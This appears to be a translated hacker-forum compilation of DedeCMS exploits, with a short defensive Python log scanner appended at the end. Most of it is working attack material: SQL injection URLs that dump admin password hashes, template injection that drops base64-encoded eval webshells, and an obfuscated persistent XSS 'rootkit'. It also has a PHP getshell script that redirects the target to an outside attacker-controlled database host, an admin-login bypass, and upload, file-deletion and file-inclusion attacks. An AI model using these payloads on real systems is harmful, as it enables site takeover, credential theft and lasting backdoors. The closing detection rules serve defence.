Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code:
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, creating a one-line webshell directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. No matter how you then visit either of the URLs below, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you can go straight into the site backend.
The precondition for this vulnerability is that the backend path must be known.
Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member area, publish an article and upload an image, then in attachment management replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system GetShell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after the upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; from that, remove 3 from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php page uninitialized-variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS logging database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is visible.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
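A defender-side check, added here as an example and not part of the original post: a small Python scanner that turns the request patterns listed above (GLOBALS/cfg_ variable override, updatexml in rss.php, raw sql= to advancedsearch.php, gotopage XSS, edit_face.php path traversal, carbuyaction.php LFI, the GBK wide-byte quote in infosearch.php) into detection rules and runs them over constructed access-log lines. Function and rule names, the sample IP, date and hosts are my own; the form-based payloads (mytag_js.php, select_soft_post.php, article_edit.php) travel in POST bodies, which a standard access log does not record, so those need a request-body log or WAF.

```python
import re
from urllib.parse import unquote_to_bytes

# Detection rules for the DedeCMS request patterns listed on this page.
# Each regex runs against the percent-decoded request path + query string.
RULES = [
    # register_globals-style override of cfg_* via _COOKIE/_POST/_GET[GLOBALS] keys
    ("dede-variable-override", re.compile(
        r"_(COOKIE|POST|GET|REQUEST)\[GLOBALS\]"
        r"|(?:^|[?&\[])cfg_(dbhost|dbuser|dbpwd|dbname|dbprefix|basedir|imgtype|softtype|mediatype|not_allowall)\b", re.I)),
    ("rss-updatexml-sqli", re.compile(r"/plus/rss\.php\?.*updatexml\s*\(", re.I)),
    ("advancedsearch-raw-sql", re.compile(r"/plus/advancedsearch\.php\?.*[?&]sql=", re.I)),
    ("gotopage-xss", re.compile(r"[?&]gotopage=[^&]*<\s*script", re.I)),
    ("edit_face-traversal", re.compile(r"/member/edit_face\.php\?.*oldface=[^&]*\.\./", re.I)),
    ("carbuyaction-lfi", re.compile(r"/plus/carbuyaction\.php\?.*code=[^&]*\.\./", re.I)),
    # GBK lead byte (0x81-0xFE) right before a quote, then UNION: wide-byte injection
    ("gbk-wide-byte-sqli", re.compile(r"[\x81-\xfe]'.*\bunion\b", re.I)),
]

LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def decode_target(target: str) -> str:
    """Percent-decode to raw bytes, then map bytes 1:1 to characters (latin-1),
    so a GBK lead byte such as %cf survives instead of becoming U+FFFD."""
    return unquote_to_bytes(target.replace("+", " ")).decode("latin-1")


def scan_line(line: str) -> list:
    """Return the names of all rules matching one common-log-format line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    target = decode_target(m.group("target"))
    return [name for name, rx in RULES if rx.search(target)]


def scan_log(lines) -> list:
    """Return (line_number, rule_name) pairs for every hit in the log."""
    return [(no, name) for no, line in enumerate(lines, 1) for name in scan_line(line)]


def log_line(target: str) -> str:
    # Constructed common-log-format line (sample client IP and date) around a request target.
    return f'198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET {target} HTTP/1.1" 200 512'


# Constructed request targets mirroring the URLs on this page (hosts and values are samples).
SAMPLE_TARGETS = [
    "/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23'][0]=1",
    "/dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.5",
    "/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60",
    "/dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif",
    "/plus/carbuyaction.php?code=../../",
    "/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*",
    "/plus/list.php?tid=3",  # benign
    "/index.php",            # benign
]
SAMPLE_LOG = [log_line(t) for t in SAMPLE_TARGETS]

if __name__ == "__main__":
    for no, name in scan_log(SAMPLE_LOG):
        print(f"line {no}: {name}")
```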